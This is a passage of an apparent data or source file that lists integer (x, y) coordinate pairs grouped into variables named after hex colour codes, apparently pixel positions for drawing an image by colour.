(99, 145), (99, 147), (99, 148), (99, 150), (99, 151), (99, 152), (99, 153), (99, 154), (99, 156), (99, 166), (99, 168), (99, 169), (99, 170), (99, 171), (99, 172), (99, 173), (99, 174), (99, 175), (99, 176), (99, 178), (100, 145), (100, 146), (100, 150), (100, 151), (100, 152), (100, 153), (100, 154), (100, 156), (100, 166), (100, 168), (100, 169), (100, 170), (100, 171), (100, 172), (100, 173), (100, 174), (100, 175), (100, 176), (100, 178), (101, 144), (101, 147), (101, 150), (101, 152), (101, 153), (101, 154), (101, 156), (101, 166), (101, 168), (101, 169), (101, 170), (101, 171), (101, 172), (101, 173), (101, 174), (101, 175), (101, 176), (101, 178), (102, 143), (102, 145), (102, 147), (102, 151), (102, 153), (102, 155), (102, 166), (102, 168), (102, 169), (102, 170), (102, 171), (102, 172), (102, 173), (102, 174), (102, 175),
(102, 176), (102, 178), (103, 142), (103, 144), (103, 145), (103, 147), (103, 151), (103, 155), (103, 166), (103, 168), (103, 169), (103, 170), (103, 171), (103, 172), (103, 173), (103, 174), (103, 175), (103, 176), (103, 178), (104, 142), (104, 144), (104, 145), (104, 146), (104, 148), (104, 152), (104, 154), (104, 166), (104, 168), (104, 169), (104, 170), (104, 171), (104, 172), (104, 173), (104, 174), (104, 175), (104, 176), (104, 178), (105, 141), (105, 143), (105, 144), (105, 145), (105, 146), (105, 148), (105, 153), (105, 166), (105, 168), (105, 169), (105, 170), (105, 171), (105, 172), (105, 173), (105, 174), (105, 175), (105, 176), (105, 178), (106, 141), (106, 143), (106, 144), (106, 145), (106, 146), (106, 147), (106, 149), (106, 166), (106, 168), (106, 169), (106, 170), (106, 171), (106, 172), (106, 173), (106, 174), (106, 175), (106, 176),
(106, 178), (107, 140), (107, 142), (107, 143), (107, 144), (107, 145), (107, 146), (107, 147), (107, 149), (107, 166), (107, 168), (107, 169), (107, 170), (107, 171), (107, 172), (107, 173), (107, 174), (107, 175), (107, 176), (107, 178), (108, 139), (108, 141), (108, 142), (108, 143), (108, 144), (108, 145), (108, 146), (108, 147), (108, 148), (108, 149), (108, 166), (108, 168), (108, 169), (108, 170), (108, 171), (108, 172), (108, 173), (108, 174), (108, 175), (108, 176), (108, 178), (109, 138), (109, 140), (109, 141), (109, 142), (109, 143), (109, 144), (109, 145), (109, 146), (109, 148), (109, 166), (109, 168), (109, 169), (109, 170), (109, 171), (109, 172), (109, 173), (109, 174), (109, 175), (109, 176), (109, 178), (110, 137), (110, 139), (110, 140), (110, 141), (110, 142), (110, 143), (110, 144), (110, 145), (110, 146), (110, 148), (110, 166),
(110, 168), (110, 169), (110, 170), (110, 171), (110, 172), (110, 173), (110, 174), (110, 175), (110, 176), (110, 178), (111, 138), (111, 139), (111, 140), (111, 141), (111, 142), (111, 143), (111, 144), (111, 145), (111, 146), (111, 147), (111, 148), (111, 166), (111, 168), (111, 169), (111, 170), (111, 171), (111, 172), (111, 173), (111, 174), (111, 175), (111, 177), (112, 135), (112, 138), (112, 139), (112, 140), (112, 141), (112, 142), (112, 143), (112, 144), (112, 145), (112, 147), (112, 166), (112, 168), (112, 169), (112, 170), (112, 171), (112, 172), (112, 173), (112, 174), (112, 176), (113, 134), (113, 140), (113, 141), (113, 142), (113, 143), (113, 144), (113, 145), (113, 147), (113, 166), (113, 168), (113, 169), (113, 170), (113, 171), (113, 172), (113, 173), (113, 174), (113, 176), (114, 133), (114, 135), (114, 136), (114, 137), (114, 138),
(114, 141), (114, 142), (114, 143), (114, 144), (114, 146), (114, 165), (114, 167), (114, 168), (114, 169), (114, 170), (114, 171), (114, 172), (114, 173), (114, 175), (115, 140), (115, 142), (115, 143), (115, 144), (115, 146), (115, 164), (115, 171), (115, 172), (115, 173), (115, 175), (116, 141), (116, 143), (116, 144), (116, 145), (116, 147), (116, 163), (116, 165), (116, 166), (116, 167), (116, 168), (116, 169), (116, 170), (116, 172), (116, 173), (116, 174), (116, 176), (117, 142), (117, 147), (117, 171), (117, 173), (117, 174), (117, 176), (118, 143), (118, 145), (118, 147), (118, 172), (118, 175), (118, 177), (119, 173), (119, 178), (120, 175), )
coordinates_5FCC60 = ((126, 175),
(127, 173), (127, 174), (127, 177), (128, 143), (128, 145), (128, 146), (128, 147), (128, 149), (128, 163), (128, 165), (128, 166), (128, 167), (128, 168), (128, 169), (128, 170), (128, 171), (128, 172), (128, 175), (128, 178), (129, 141), (129, 149), (129, 164), (129, 173), (129, 174), (129, 175), (129, 176), (129, 178), (130, 139), (130, 143), (130, 144), (130, 145), (130, 146), (130, 147), (130, 149), (130, 164), (130, 166), (130, 167), (130, 168), (130, 169), (130, 170), (130, 171), (130, 172), (130, 173), (130, 174), (130, 175), (130, 176), (130, 178), (131, 137), (131, 141), (131, 142), (131, 143), (131, 144), (131, 145), (131, 146), (131, 147), (131, 149), (131, 165), (131, 167), (131, 168), (131, 169), (131, 170), (131, 171), (131, 172), (131, 173), (131, 174), (131, 175), (131, 176), (131, 178), (132, 134), (132, 135), (132, 139), (132, 140),
(132, 141), (132, 142), (132, 143), (132, 144), (132, 145), (132, 146), (132, 148), (132, 165), (132, 167), (132, 168), (132, 169), (132, 170), (132, 171), (132, 172), (132, 173), (132, 174), (132, 175), (132, 176), (132, 178), (133, 135), (133, 137), (133, 138), (133, 139), (133, 140), (133, 141), (133, 142), (133, 143), (133, 144), (133, 145), (133, 146), (133, 148), (133, 166), (133, 168), (133, 169), (133, 170), (133, 171), (133, 172), (133, 173), (133, 174), (133, 175), (133, 176), (133, 178), (134, 136), (134, 138), (134, 139), (134, 140), (134, 141), (134, 142), (134, 143), (134, 144), (134, 145), (134, 146), (134, 148), (134, 166), (134, 168), (134, 169), (134, 170), (134, 171), (134, 172), (134, 173), (134, 174), (134, 175), (134, 177), (135, 137), (135, 139), (135, 140), (135, 141), (135, 142), (135, 143), (135, 144), (135, 145), (135, 147),
(135, 166), (135, 168), (135, 169), (135, 170), (135, 171), (135, 172), (135, 173), (135, 174), (135, 175), (135, 177), (136, 138), (136, 140), (136, 141), (136, 142), (136, 143), (136, 144), (136, 145), (136, 147), (136, 166), (136, 168), (136, 169), (136, 170), (136, 171), (136, 172), (136, 173), (136, 174), (136, 175), (136, 177), (137, 139), (137, 141), (137, 142), (137, 143), (137, 144), (137, 145), (137, 146), (137, 148), (137, 166), (137, 168), (137, 169), (137, 170), (137, 171), (137, 172), (137, 173), (137, 174), (137, 176), (138, 139), (138, 141), (138, 142), (138, 143), (138, 144), (138, 145), (138, 146), (138, 147), (138, 149), (138, 166), (138, 168), (138, 169), (138, 170), (138, 171), (138, 172), (138, 173), (138, 174), (138, 176), (139, 140), (139, 142), (139, 143), (139, 144), (139, 145), (139, 146), (139, 147), (139, 149), (139, 166),
(139, 168), (139, 169), (139, 170), (139, 171), (139, 172), (139, 173), (139, 174), (139, 175), (139, 177), (140, 141), (140, 143), (140, 144), (140, 145), (140, 146), (140, 147), (140, 149), (140, 166), (140, 168), (140, 169), (140, 170), (140, 171), (140, 172), (140, 173), (140, 174), (140, 175), (140, 176), (140, 178), (141, 142), (141, 144), (141, 145), (141, 146), (141, 148), (141, 166), (141, 168), (141, 169), (141, 170), (141, 171), (141, 172), (141, 173), (141, 174), (141, 175), (141, 176), (141, 177), (141, 179), (142, 142), (142, 144), (142, 145), (142, 146), (142, 148), (142, 153), (142, 154), (142, 166), (142, 168), (142, 169), (142, 170), (142, 171), (142, 172), (142, 173), (142, 174), (142, 175), (142, 176), (142, 177), (142, 179), (143, 143), (143, 145), (143, 146), (143, 148), (143, 155), (143, 167), (143, 169), (143, 170), (143, 171),
(143, 172), (143, 173), (143, 174), (143, 175), (143, 176), (143, 177), (143, 179), (144, 143), (144, 145), (144, 146), (144, 148), (144, 152), (144, 155), (144, 167), (144, 169), (144, 170), (144, 171), (144, 172), (144, 173), (144, 174), (144, 175), (144, 176), (144, 177), (144, 179), (145, 144), (145, 146), (145, 148), (145, 151), (145, 153), (145, 154), (145, 156), (145, 167), (145, 169), (145, 170), (145, 171), (145, 172), (145, 173), (145, 174), (145, 175), (145, 176), (145, 177), (145, 179), (146, 145), (146, 147), (146, 148), (146, 152), (146, 153), (146, 154), (146, 155), (146, 156), (146, 168), (146, 170), (146, 171), (146, 172), (146, 173), (146, 174), (146, 175), (146, 176), (146, 177), (146, 179), (147, 146), (147, 148), (147, 149), (147, 151), (147, 152), (147, 153), (147, 154), (147, 155), (147, 157), (147, 169), (147, 171), (147, 172),
(147, 173), (147, 174), (147, 175), (147, 176), (147, 177), (147, 179), (148, 146), (148, 148), (148, 150), (148, 151), (148, 152), (148, 153), (148, 154), (148, 155), (148, 157), (148, 170), (148, 172), (148, 173), (148, 174), (148, 175), (148, 176), (148, 177), (148, 178), (148, 179), (149, 146), (149, 148), (149, 149), (149, 150), (149, 151), (149, 152), (149, 153), (149, 154), (149, 155), (149, 156), (149, 158), (149, 171), (149, 173), (149, 174), (149, 175), (149, 176), (149, 178), (150, 146), (150, 148), (150, 149), (150, 150), (150, 151), (150, 152), (150, 153), (150, 154), (150, 155), (150, 156), (150, 158), (150, 172), (150, 174), (150, 175), (150, 176), (150, 178), (151, 146), (151, 148), (151, 149), (151, 150), (151, 151), (151, 152), (151, 153), (151, 154), (151, 155), (151, 157), (151, 167), (151, 173), (151, 175), (151, 176), (151, 178),
(152, 147), (152, 148), (152, 149), (152, 150), (152, 151), (152, 152), (152, 153), (152, 154), (152, 155), (152, 157), (152, 167), (152, 168), (152, 173), (152, 175), (152, 176), (152, 178), (153, 147), (153, 149), (153, 150), (153, 151), (153, 152), (153, 153), (153, 154), (153, 155), (153, 157), (153, 167), (153, 169), (153, 173), (153, 174), (153, 175), (153, 176), (153, 178), (154, 147), (154, 149), (154, 150), (154, 151), (154, 152), (154, 153), (154, 154), (154, 155), (154, 157), (154, 167), (154, 170), (154, 171), (154, 172), (154, 173), (154, 174), (154, 175), (154, 176), (154, 177), (154, 178), (155, 148), (155, 150), (155, 151), (155, 152), (155, 153), (155, 154), (155, 156), (155, 162), (155, 167), (155, 169), (155, 172), (155, 173), (155, 174), (155, 175), (155, 176), (155, 177), (155, 178), (156, 148), (156, 150), (156, 151), (156, 152),
(156, 153), (156, 154), (156, 156), (156, 161), (156, 162), (156, 168), (156, 170), (156, 171), (156, 172), (156, 173), (156, 174), (156, 175), (156, 177), (157, 149), (157, 151), (157, 152), (157, 153), (157, 155), (157, 161), (157, 162), (157, 168), (157, 170), (157, 171), (157, 172), (157, 173), (157, 174), (157, 175), (157, 176), (157, 177), (158, 149), (158, 151), (158, 152), (158, 153), (158, 155), (158, 161), (158, 162), (158, 169), (158, 171), (158, 172), (158, 173), (158, 174), (158, 175), (158, 177), (159, 150), (159, 152), (159, 153), (159, 155), (159, 160), (159, 163), (159, 169), (159, 171), (159, 172), (159, 173), (159, 174), (159, 175), (159, 177), (160, 150), (160, 152), (160, 153), (160, 155), (160, 160), (160, 162), (160, 164), (160, 168), (160, 170), (160, 171), (160, 172), (160, 173), (160, 174), (160, 176), (161, 150), (161, 152),
(161, 153), (161, 154), (161, 156), (161, 160), (161, 162), (161, 163), (161, 165), (161, 166), (161, 167), (161, 168), (161, 169), (161, 170), (161, 171), (161, 172), (161, 173), (161, 175), (162, 151), (162, 153), (162, 154), (162, 155), (162, 156), (162, 160), (162, 162), (162, 163), (162, 164), (162, 168), (162, 169), (162, 170), (162, 171), (162, 172), (162, 174), (163, 151), (163, 153), (163, 155), (163, 160), (163, 162), (163, 163), (163, 164), (163, 165), (163, 166), (163, 167), (163, 168), (163, 169), (163, 170), (163, 171), (163, 172), (163, 174), (164, 152), (164, 155), (164, 159), (164, 161), (164, 162), (164, 163), (164, 164), (164, 165), (164, 166), (164, 167), (164, 168), (164, 169), (164, 170), (164, 171), (164, 172), (164, 174), (165, 152), (165, 155), (165, 159), (165, 161), (165, 162), (165, 163), (165, 164), (165, 165), (165, 166),
(165, 167), (165, 168), (165, 169), (165, 170), (165, 171), (165, 174), (166, 152), (166, 154), (166, 155), (166, 159), (166, 161), (166, 162), (166, 163), (166, 164), (166, 165), (166, 166), (166, 167), (166, 168), (166, 169), (166, 170), (166, 173), (167, 152), (167, 154), (167, 155), (167, 158), (167, 159), (167, 160), (167, 161), (167, 162), (167, 163), (167, 164), (167, 165), (167, 166), (167, 167), (167, 171), (168, 152), (168, 154), (168, 155), (168, 156), (168, 158), (168, 159), (168, 160), (168, 161), (168, 162), (168, 163), (168, 164), (168, 165), (168, 166), (168, 170), (169, 152), (169, 155), (169, 156), (169, 158), (169, 159), (169, 160), (169, 161), (169, 162), (169, 163), (169, 164), (169, 165), (169, 167), (170, 154), (170, 155), (170, 156), (170, 157), (170, 158), (170, 159), (170, 160), (170, 161), (170, 162), (170, 163), (170, 164),
(170, 166), (171, 155), (171, 157), (171, 158), (171, 159), (171, 165), (172, 155), (172, 157), (172, 160), (172, 161), (172, 162), (172, 164), (173, 155), (173, 159), (174, 156), )
coordinates_F4DEB3 = ((129, 67),
(129, 68), (130, 67), (130, 68), (131, 68), (131, 69), (132, 68), (132, 70), (133, 69), (133, 71), (134, 70), (134, 72), (135, 71), (135, 74), (136, 71), (136, 75), (137, 70), (137, 75), (138, 69), (138, 71), (138, 72), (138, 74), (138, 106), (139, 68), (139, 81), (139, 83), (139, 84), (139, 86), (139, 104), (139, 107), (140, 68), (140, 70), (140, 79), (140, 88), (141, 70), (141, 78), (141, 81), (141, 82), (141, 83), (141, 84), (141, 85), (141, 86), (141, 89), (141, 105), (141, 108), (142, 69), (142, 70), (142, 77), (142, 79), (142, 81), (142, 82), (142, 83), (142, 90), (142, 106), (142, 108), (143, 69), (143, 71), (143, 77), (143, 81), (143, 83), (143, 84), (143, 85), (143, 86), (143, 87), (143, 88), (143, 90), (144, 70), (144, 76), (144, 77), (144, 81), (144, 83), (145, 71), (145, 72),
(145, 76), (145, 77), (145, 81), (145, 83), (146, 71), (146, 74), (146, 76), (146, 81), (146, 83), (147, 72), (147, 76), (147, 82), (147, 83), (148, 73), (148, 75), (148, 82), (148, 84), (149, 82), (149, 84), )
coordinates_26408B = ((123, 103),
(123, 105), (123, 106), (123, 107), (123, 108), (123, 109), (123, 110), (123, 111), (123, 112), (123, 113), (124, 80), (124, 82), (124, 83), (124, 85), (124, 86), (124, 89), (124, 90), (124, 91), (124, 92), (124, 93), (124, 94), (124, 95), (124, 96), (124, 98), (124, 102), (124, 110), (124, 111), (124, 112), (124, 113), (124, 114), (124, 115), (124, 116), (124, 117), (124, 118), (124, 119), (124, 121), (125, 76), (125, 77), (125, 78), (125, 79), (125, 91), (125, 94), (125, 100), (125, 103), (125, 106), (125, 107), (125, 108), (125, 109), (125, 116), (125, 122), (126, 70), (126, 72), (126, 73), (126, 74), (126, 75), (126, 82), (126, 83), (126, 84), (126, 85), (126, 86), (126, 89), (126, 91), (126, 95), (126, 97), (126, 98), (126, 103), (126, 117), (126, 119), (126, 120), (126, 122), (127, 69), (127, 76), (127, 77),
(127, 78), (127, 80), (127, 84), (127, 85), (127, 86), (127, 87), (127, 91), (127, 96), (127, 98), (127, 99), (127, 100), (127, 102), (127, 117), (127, 118), (127, 121), (128, 69), (128, 71), (128, 72), (128, 73), (128, 74), (128, 75), (128, 76), (128, 77), (128, 79), (128, 84), (128, 86), (128, 89), (128, 91), (128, 97), (128, 99), (128, 100), (128, 102), (128, 114), (128, 116), (128, 120), (129, 70), (129, 72), (129, 73), (129, 74), (129, 75), (129, 76), (129, 78), (129, 84), (129, 86), (129, 90), (129, 91), (129, 98), (129, 100), (129, 102), (129, 111), (129, 113), (129, 118), (130, 71), (130, 77), (130, 84), (130, 86), (130, 87), (130, 90), (130, 91), (130, 99), (130, 102), (130, 110), (130, 114), (130, 116), (131, 71), (131, 72), (131, 74), (131, 75), (131, 77), (131, 84), (131, 87), (131, 91),
(131, 100), (131, 102), (131, 110), (131, 112), (131, 113), (131, 115), (132, 85), (132, 87), (132, 91), (132, 101), (132, 110), (132, 112), (132, 113), (132, 115), (133, 87), (133, 89), (133, 91), (133, 110), (133, 112), (133, 113), (133, 115), (134, 113), (134, 115), (135, 111), (135, 113), (135, 115), (136, 112), (136, 114), (136, 116), (137, 113), (137, 115), (137, 116), (138, 114), (138, 117), (139, 115), (139, 118), (140, 115), (140, 118), (141, 115), (141, 118), (142, 115), (142, 118), (143, 114), (143, 117), (144, 114), (144, 116), (145, 114), (145, 116), (146, 115), )
coordinates_F5DEB3 = ((90, 82),
(90, 84), (90, 85), (90, 86), (90, 87), (90, 88), (90, 89), (91, 74), (91, 75), (91, 81), (91, 85), (91, 90), (91, 92), (92, 73), (92, 76), (92, 77), (92, 80), (92, 83), (92, 87), (92, 89), (92, 92), (93, 73), (93, 78), (93, 79), (93, 82), (93, 88), (93, 90), (93, 92), (94, 72), (94, 73), (94, 74), (94, 77), (94, 81), (94, 88), (94, 91), (95, 72), (95, 73), (95, 79), (95, 80), (95, 87), (95, 90), (96, 72), (96, 73), (96, 86), (96, 88), (96, 90), (97, 72), (97, 73), (97, 85), (97, 87), (97, 89), (98, 72), (98, 73), (98, 84), (98, 86), (98, 87), (98, 89), (99, 72), (99, 74), (99, 83), (99, 85), (99, 86), (99, 87), (99, 90), (100, 73), (100, 75), (100, 83), (100, 88), (100, 89), (100, 90), (100, 91), (100, 92), (100, 94),
(101, 74), (101, 76), (101, 83), (101, 85), (101, 86), (102, 74), (102, 77), (103, 68), (103, 70), (103, 74), (103, 76), (103, 78), (104, 68), (104, 71), (104, 72), (104, 73), (104, 75), (104, 76), (104, 77), (104, 80), (105, 68), (105, 72), (105, 73), (105, 74), (105, 78), (105, 81), (106, 67), (106, 70), (106, 75), (106, 76), (106, 82), (107, 67), (107, 69), (107, 78), (107, 79), (107, 81), (108, 67), (108, 68), (109, 67), (109, 68), (110, 66), (110, 68), (111, 66), (111, 68), (112, 67), (112, 69), (112, 73), (113, 68), (113, 71), (113, 73), (114, 69), (114, 72), (115, 69), (115, 72), (116, 71), )
coordinates_016400 = ((127, 126),
(127, 127), (128, 128), (129, 127), (129, 129), (130, 128), (130, 130), (132, 132), (133, 131), (133, 133), (134, 131), (134, 132), (134, 134), (135, 132), (135, 134), (136, 132), (136, 135), (137, 132), (137, 134), (137, 136), (138, 132), (138, 137), (139, 133), (139, 138), (140, 136), (140, 139), (141, 137), (141, 139), (142, 137), (142, 140), (143, 136), (144, 135), (144, 139), (144, 141), (145, 134), (145, 137), (146, 133), (146, 136), (147, 132), (147, 135), (148, 131), (148, 134), (149, 130), (149, 133), (150, 131), (150, 132), )
coordinates_B8EDC2 = ((116, 131),
(116, 133), (116, 134), (116, 135), (116, 136), (116, 138), (117, 130), (117, 140), (118, 130), (118, 132), (118, 133), (118, 134), (118, 135), (118, 136), (118, 137), (118, 138), (118, 141), (119, 128), (119, 130), (119, 131), (119, 132), (119, 133), (119, 134), (119, 135), (119, 136), (119, 137), (119, 138), (119, 139), (120, 127), (120, 130), (120, 131), (120, 132), (120, 133), (120, 134), (120, 135), (120, 136), (120, 137), (120, 138), (120, 139), (120, 140), (120, 143), (121, 127), (121, 129), (121, 130), (121, 131), (121, 132), (121, 133), (121, 134), (121, 135), (121, 136), (121, 137), (121, 138), (121, 139), (121, 140), (121, 141), (121, 144), (122, 127), (122, 129), (122, 130), (122, 131), (122, 132), (122, 133), (122, 134), (122, 135), (122, 136), (122, 137), (122, 138), (122, 139), (122, 140), (122, 141), (122, 142), (122, 144), (123, 127),
(123, 129), (123, 130), (123, 131), (123, 132), (123, 133), (123, 134), (123, 135), (123, 136), (123, 137), (123, 138), (123, 139), (123, 140), (123, 141), (123, 142), (123, 144), (124, 128), (124, 129), (124, 130), (124, 131), (124, 132), (124, 133), (124, 134), (124, 135), (124, 136), (124, 137), (124, 138), (124, 139), (124, 140), (124, 141), (124, 142), (124, 144), (125, 127), (125, 130), (125, 131), (125, 132), (125, 133), (125, 134), (125, 135), (125, 136), (125, 137), (125, 138), (125, 139), (125, 140), (125, 141), (125, 144), (126, 128), (126, 131), (126, 132), (126, 133), (126, 134), (126, 135), (126, 136), (126, 137), (126, 138), (126, 139), (126, 142), (126, 143), (127, 130), (127, 132), (127, 133), (127, 134), (127, 135), (127, 136), (127, 137), (127, 141), (128, 131), (128, 133), (128, 134), (128, 135), (128, 139), (129, 132), (129, 137),
(130, 133), (130, 135), )
coordinates_CC5B45 = ((151, 78),
(151, 80), (151, 81), (151, 82), (151, 83), (151, 84), (151, 85), (152, 78), (153, 78), (153, 80), (153, 81), (153, 82), (153, 84), (154, 78), (154, 80), (154, 81), (154, 82), (154, 84), (155, 78), (155, 80), (155, 81), (155, 82), (155, 84), (156, 79), (156, 81), (156, 82), (156, 84), (157, 79), (157, 81), (157, 82), (157, 84), (157, 90), (157, 91), (157, 100), (157, 113), (157, 114), (157, 116), (158, 79), (158, 81), (158, 82), (158, 84), (158, 88), (158, 92), (158, 100), (158, 113), (158, 117), (159, 80), (159, 82), (159, 83), (159, 84), (159, 87), (159, 90), (159, 92), (159, 100), (159, 113), (159, 115), (159, 116), (159, 118), (160, 80), (160, 82), (160, 83), (160, 84), (160, 85), (160, 88), (160, 89), (160, 90), (160, 92), (160, 100), (160, 112), (160, 113), (160, 115), (160, 116), (160, 118),
(161, 81), (161, 83), (161, 84), (161, 85), (161, 86), (161, 87), (161, 88), (161, 89), (161, 90), (161, 92), (161, 100), (161, 104), (161, 112), (161, 114), (161, 115), (161, 116), (161, 118), (162, 81), (162, 84), (162, 85), (162, 86), (162, 87), (162, 88), (162, 89), (162, 91), (162, 101), (162, 105), (162, 112), (162, 114), (162, 115), (162, 116), (162, 118), (163, 82), (163, 84), (163, 85), (163, 86), (163, 87), (163, 88), (163, 90), (163, 103), (163, 104), (163, 108), (163, 111), (163, 113), (163, 114), (163, 115), (163, 116), (163, 118), (164, 83), (164, 85), (164, 86), (164, 87), (164, 89), (164, 105), (164, 106), (164, 111), (164, 112), (164, 113), (164, 114), (164, 115), (164, 116), (164, 118), (165, 84), (165, 86), (165, 88), (165, 111), (165, 112), (165, 113), (165, 114), (165, 115), (165, 117), (166, 84),
(166, 87), (166, 94), (166, 109), (166, 111), (166, 112), (166, 113), (166, 114), (166, 115), (166, 116), (166, 117), (167, 84), (167, 86), (167, 87), (167, 92), (167, 93), (167, 110), (167, 112), (167, 113), (167, 114), (167, 115), (167, 117), (168, 85), (168, 87), (168, 88), (168, 89), (168, 90), (168, 93), (168, 110), (168, 112), (168, 113), (168, 114), (168, 115), (168, 117), (169, 86), (169, 88), (169, 91), (169, 93), (169, 104), (169, 105), (169, 110), (169, 112), (169, 113), (169, 114), (169, 115), (169, 117), (170, 89), (170, 90), (170, 91), (170, 93), (170, 101), (170, 103), (170, 106), (170, 107), (170, 108), (170, 109), (170, 110), (170, 111), (170, 112), (170, 113), (170, 114), (170, 115), (170, 117), (171, 90), (171, 91), (171, 92), (171, 93), (171, 94), (171, 95), (171, 98), (171, 99), (171, 100), (171, 104),
(171, 105), (171, 110), (171, 111), (171, 112), (171, 113), (171, 114), (171, 115), (171, 117), (172, 89), (172, 97), (172, 101), (172, 102), (172, 103), (172, 104), (172, 109), (172, 110), (172, 111), (172, 112), (172, 113), (172, 114), (172, 115), (172, 117), (173, 90), (173, 92), (173, 93), (173, 94), (173, 95), (173, 96), (173, 99), (173, 100), (173, 101), (173, 102), (173, 105), (173, 109), (173, 110), (173, 111), (173, 112), (173, 113), (173, 114), (173, 115), (173, 117), (174, 98), (174, 103), (174, 104), (174, 109), (174, 111), (174, 112), (174, 113), (174, 114), (174, 115), (174, 117), (175, 100), (175, 102), (175, 109), (175, 111), (175, 112), (175, 113), (175, 114), (175, 115), (175, 117), (176, 109), (176, 111), (176, 112), (176, 113), (176, 114), (176, 115), (176, 117), (177, 110), (177, 112), (177, 113), (177, 114), (177, 115),
(178, 110), (178, 112), (178, 113), (178, 114), (178, 117), (179, 110), (179, 115), (180, 112), )
coordinates_27408B = ((100, 112),
(100, 114), (100, 116), (101, 111), (101, 117), (102, 110), (102, 112), (102, 113), (102, 114), (102, 115), (102, 118), (103, 110), (103, 112), (103, 113), (103, 114), (103, 115), (103, 116), (103, 117), (103, 119), (103, 120), (103, 122), (104, 109), (104, 111), (104, 112), (104, 113), (104, 114), (104, 115), (104, 116), (104, 117), (104, 118), (104, 122), (105, 109), (105, 111), (105, 112), (105, 113), (105, 114), (105, 115), (105, 116), (105, 117), (105, 118), (105, 119), (105, 120), (105, 122), (106, 109), (106, 111), (106, 112), (106, 113), (106, 114), (106, 115), (106, 116), (106, 117), (106, 118), (106, 119), (106, 120), (106, 122), (107, 109), (107, 111), (107, 112), (107, 113), (107, 114), (107, 115), (107, 116), (107, 117), (107, 118), (107, 119), (107, 120), (107, 122), (108, 109), (108, 111), (108, 114), (108, 115), (108, 116), (108, 117),
(108, 118), (108, 119), (108, 120), (108, 122), (109, 89), (109, 91), (109, 93), (109, 109), (109, 112), (109, 113), (109, 116), (109, 117), (109, 118), (109, 119), (109, 120), (109, 122), (110, 89), (110, 93), (110, 110), (110, 111), (110, 114), (110, 117), (110, 118), (110, 119), (110, 120), (110, 122), (111, 89), (111, 91), (111, 93), (111, 101), (111, 103), (111, 110), (111, 116), (111, 118), (111, 119), (111, 120), (111, 122), (112, 79), (112, 82), (112, 89), (112, 91), (112, 92), (112, 94), (112, 100), (112, 104), (112, 117), (112, 119), (112, 120), (112, 122), (113, 79), (113, 83), (113, 89), (113, 91), (113, 92), (113, 94), (113, 99), (113, 101), (113, 102), (113, 105), (113, 118), (113, 120), (113, 122), (114, 79), (114, 81), (114, 82), (114, 85), (114, 89), (114, 91), (114, 92), (114, 94), (114, 99), (114, 101),
(114, 102), (114, 103), (114, 105), (114, 119), (114, 122), (115, 79), (115, 80), (115, 81), (115, 82), (115, 83), (115, 84), (115, 86), (115, 87), (115, 88), (115, 89), (115, 90), (115, 91), (115, 92), (115, 94), (115, 99), (115, 101), (115, 102), (115, 103), (115, 104), (115, 106), (115, 119), (115, 122), (116, 80), (116, 82), (116, 83), (116, 84), (116, 85), (116, 89), (116, 90), (116, 91), (116, 92), (116, 94), (116, 99), (116, 101), (116, 102), (116, 103), (116, 104), (116, 105), (116, 107), (116, 120), (116, 122), (117, 73), (117, 74), (117, 81), (117, 83), (117, 84), (117, 85), (117, 86), (117, 87), (117, 88), (117, 89), (117, 90), (117, 91), (117, 92), (117, 94), (117, 98), (117, 100), (117, 101), (117, 104), (117, 105), (117, 106), (117, 109), (117, 110), (117, 111), (117, 112), (117, 113), (117, 114),
(117, 115), (117, 116), (117, 120), (117, 122), (118, 72), (118, 75), (118, 81), (118, 83), (118, 84), (118, 85), (118, 86), (118, 87), (118, 88), (118, 89), (118, 92), (118, 93), (118, 95), (118, 98), (118, 100), (118, 102), (118, 104), (118, 105), (118, 106), (118, 107), (118, 111), (118, 122), (119, 73), (119, 76), (119, 80), (119, 81), (119, 82), (119, 83), (119, 84), (119, 85), (119, 86), (119, 87), (119, 88), (119, 89), (119, 91), (119, 92), (119, 93), (119, 95), (119, 98), (119, 100), (119, 104), (119, 115), (119, 116), (119, 117), (119, 118), (119, 119), (119, 121), (120, 74), (120, 78), (120, 79), (120, 81), (120, 82), (120, 83), (120, 84), (120, 85), (120, 86), (120, 87), (120, 89), (120, 92), (120, 97), (120, 98), (120, 100), (120, 104), (120, 106), (120, 107), (120, 108), (120, 109), (120, 110),
(120, 111), (120, 112), (120, 113), (121, 76), (121, 77), (121, 78), (121, 79), (121, 80), (121, 81), (121, 89), (121, 92), (121, 93), (121, 94), (121, 95), (121, 96), (121, 100), (122, 82), (122, 83), (122, 84), (122, 87), (122, 88), (122, 98), (122, 99), )
coordinates_006400 = ((94, 132),
(95, 132), (96, 132), (96, 133), (97, 132), (97, 133), (98, 134), (99, 135), (100, 136), (101, 138), (102, 136), (102, 139), (102, 140), (102, 141), (103, 136), (103, 138), (103, 140), (104, 135), (104, 136), (104, 137), (104, 138), (104, 140), (105, 133), (105, 136), (105, 137), (105, 139), (106, 133), (106, 135), (106, 136), (106, 138), (107, 133), (107, 135), (107, 137), (108, 133), (108, 136), (109, 133), (109, 136), (110, 133), (110, 135), (111, 134), (112, 131), (112, 133), (113, 130), (113, 132), (114, 128), (114, 131), (115, 127), (115, 129), (116, 127), (116, 128), (117, 126), )
coordinates_E1B7E7 = ((118, 160),
(118, 161), (118, 162), (118, 163), (118, 164), (118, 165), (118, 166), (118, 167), (118, 169), (119, 157), (119, 158), (119, 171), (120, 156), (120, 159), (120, 160), (120, 161), (120, 162), (120, 163), (120, 164), (120, 165), (120, 166), (120, 167), (120, 168), (120, 169), (120, 171), (121, 158), (121, 159), (121, 160), (121, 161), (121, 162), (121, 163), (121, 164), (121, 165), (121, 166), (121, 167), (121, 168), (121, 169), (121, 171), (122, 156), (122, 158), (122, 159), (122, 160), (122, 161), (122, 162), (122, 163), (122, 164), (122, 165), (122, 166), (122, 167), (122, 168), (122, 169), (122, 170), (122, 172), (123, 158), (123, 159), (123, 160), (123, 161), (123, 162), (123, 163), (123, 164), (123, 165), (123, 166), (123, 167), (123, 168), (123, 169), (123, 170), (123, 172), (124, 156), (124, 159), (124, 160), (124, 161), (124, 162), (124, 163),
(124, 164), (124, 165), (124, 166), (124, 167), (124, 168), (124, 171), (125, 157), (125, 169), (125, 171), (126, 159), (126, 161), (126, 162), (126, 163), (126, 164), (126, 165), (126, 166), (126, 167), (126, 168), )
coordinates_CD5B45 = ((64, 114),
